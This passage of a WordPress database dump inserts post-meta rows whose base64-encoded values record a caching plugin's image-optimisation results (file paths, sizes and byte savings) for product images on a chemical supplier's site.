1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRmx1b3JvcG9seW1lci1jb2F0aW5nLUNhdGhldGVyLWd1aWRld2lyZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NDI3LCJ0aW1lIjoxNDgzNTcyOTAzLCJpZCI6MTM1N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GbHVvcm9wb2x5bWVyLWNvYXRpbmctQ2F0aGV0ZXItZ3VpZGV3aXJlLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmx1b3JvcG9seW1lci1jb2F0aW5nLUNhdGhldGVyLWd1aWRld2lyZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0ZsdW9yb3BvbHltZXItY29hdGluZy1DYXRoZXRlci1ndWlkZXdpcmUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjM4MCwidGltZSI6MTQ4MzU3MjkwNiwiaWQiOjEzNTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmx1b3JvcG9seW1lci1jb2F0aW5nLUNhdGhldGVyLWd1aWRld2lyZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZsdW9yb3BvbHltZXItY29hdGluZy1DYXRoZXRlci1ndWlkZXdpcmUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9GbHVvcm9wb2x5bWVyLWNvYXRpbmctQ2F0aGV0ZXItZ3VpZGV3aXJlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0MDMsInRpbWUiOjE0ODM1NzI5MDksImlkIjoxMzU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZsdW9yb3BvbHltZXItY29hdGluZy1DYXRoZXRlci1ndWlkZXdpcmUtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GbHVvcm9wb2x5bWVyLWNvYXRpbmctQ2F0aGV0ZXItZ3VpZGV3aXJlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRmx1b3JvcG9seW1lci1jb2F0aW5nLUNhdGhldGVyLWd1aWRld2lyZS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6OTY2LCJ0aW1lIjoxNDgzNTcyOTEzLCJpZCI6MTM1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZsdW9yb3BvbHltZXItY29hdGluZy1DYXRoZXRlci1ndWlkZXdpcmUtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GbHVvcm9wb2x5bWVyLWNvYXRpbmctQ2F0aGV0ZXItZ3VpZGV3aXJlLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRmx1b3JvcG9seW1lci1jb2F0aW5nLUNhdGhldGVyLWd1aWRld2lyZS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MzkwLCJ0aW1lIjoxNDgzNTcyOTE2LCJpZCI6MTM1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZsdW9yb3BvbHltZXItY29hdGluZy1DYXRoZXRlci1ndWlkZXdpcmUtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GbHVvcm9wb2x5bWVyLWNvYXRpbmctQ2F0aGV0ZXItZ3VpZGV3aXJlLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRmx1b3JvcG9seW1lci1jb2F0aW5nLUNhdGhldGVyLWd1aWRld2lyZS0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDEzLCJ0aW1lIjoxNDgzNTcyOTIwLCJpZCI6MTM1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZsdW9yb3BvbHltZXItY29hdGluZy1DYXRoZXRlci1ndWlkZXdpcmUtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GbHVvcm9wb2x5bWVyLWNvYXRpbmctQ2F0aGV0ZXItZ3VpZGV3aXJlLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRmx1b3JvcG9seW1lci1jb2F0aW5nLUNhdGhldGVyLWd1aWRld2lyZS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NDAzLCJ0aW1lIjoxNDgzNTcyOTIzLCJpZCI6MTM1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZsdW9yb3BvbHltZXItY29hdGluZy1DYXRoZXRlci1ndWlkZXdpcmUtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GbHVvcm9wb2x5bWVyLWNvYXRpbmctQ2F0aGV0ZXItZ3VpZGV3aXJlLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRmx1b3JvcG9seW1lci1jb2F0aW5nLUNhdGhldGVyLWd1aWRld2lyZS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NDU5LCJ0aW1lIjoxNDgzNTcyOTI3LCJpZCI6MTM1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZsdW9yb3BvbHltZXItY29hdGluZy1DYXRoZXRlci1ndWlkZXdpcmUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GbHVvcm9wb2x5bWVyLWNvYXRpbmctQ2F0aGV0ZXItZ3VpZGV3aXJlLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRmx1b3JvcG9seW1lci1jb2F0aW5nLUNhdGhldGVyLWd1aWRld2lyZS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NDc5LCJ0aW1lIjoxNDgzNTcyOTMwLCJpZCI6MTM1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZsdW9yb3BvbHltZXItY29hdGluZy1DYXRoZXRlci1ndWlkZXdpcmUtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GbHVvcm9wb2x5bWVyLWNvYXRpbmctQ2F0aGV0ZXItZ3VpZGV3aXJlLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRmx1b3JvcG9seW1lci1jb2F0aW5nLUNhdGhldGVyLWd1aWRld2lyZS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6NTE5LCJ0aW1lIjoxNDgzNTcyOTM0LCJpZCI6MTM1N31d'); 
INSERT INTO `wp_postmeta` VALUES (29595, 1356, 'wpfc_optimisation_reduction', '445156'); 
INSERT INTO `wp_postmeta` VALUES (29596, 1356, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTWkuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NaS5qcGciLCJ3aWR0aCI6MjU1NSwiaGVpZ2h0IjoxNjUxLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTWkuanBnIiwicmVkdWN0aW9uIjo0NDUxNDIsInRpbWUiOjE0ODM1NzI5NDQsImlkIjoiMTM1NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTWktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NaS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01pLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyOTQ3LCJpZCI6MTM1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NaS04MDB4NTE3LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTE3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01pLTgwMHg1MTcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTWktODAweDUxNy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI5NTAsImlkIjoxMzU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01pLTc2OHg0OTYuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0OTYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTWktNzY4eDQ5Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NaS03Njh4NDk2LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mjk1MiwiaWQiOjEzNTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTWktMTYwMHgxMDM0LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwMzQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTWktMTYwMHgxMDM0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01pLTE2MDB4MTAzNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI5NTYsImlkIjoxMzU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01pLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTWktMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NaS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mjk1OSwiaWQiOjEzNTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTWktMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NaS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01pLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyOTYxLCJpZCI6MTM1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NaS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01pLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTWktMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI5NjQsImlkIjoxMzU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01pLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTWktNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NaS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mjk2NiwiaWQiOjEzNTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NaS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01pLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTWktMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI5NjksImlkIjoxMzU2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTWktMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NaS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01pLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyOTcxLCJpZCI6MTM1Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01pLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTWktMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NaS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mjk3MywiaWQiOjEzNTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NaS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01pLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTWktMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI5NzYsImlkIjoxMzU2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTWktMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NaS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01pLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyOTc5LCJpZCI6MTM1Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01pLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTWktNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NaS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mjk4NCwiaWQiOjEzNTZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29597, 1353, 'wpfc_optimisation_reduction', '36788'); 
INSERT INTO `wp_postmeta` VALUES (29598, 1353, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzg4LTIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvODgtMi5qcGciLCJ3aWR0aCI6NDM2LCJoZWlnaHQiOjMyMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3Zhem84OC0yLmpwZyIsInJlZHVjdGlvbiI6MzYyNDEsInRpbWUiOjE0ODM1NzI5OTEsImlkIjoiMTM1MyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzg4LTItMzQweDMyMC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjMyMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvODgtMi0zNDB4MzIwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3Zhem84OC0yLTM0MHgzMjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyOTkzLCJpZCI6MTM1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvODgtMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem84OC0yLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiX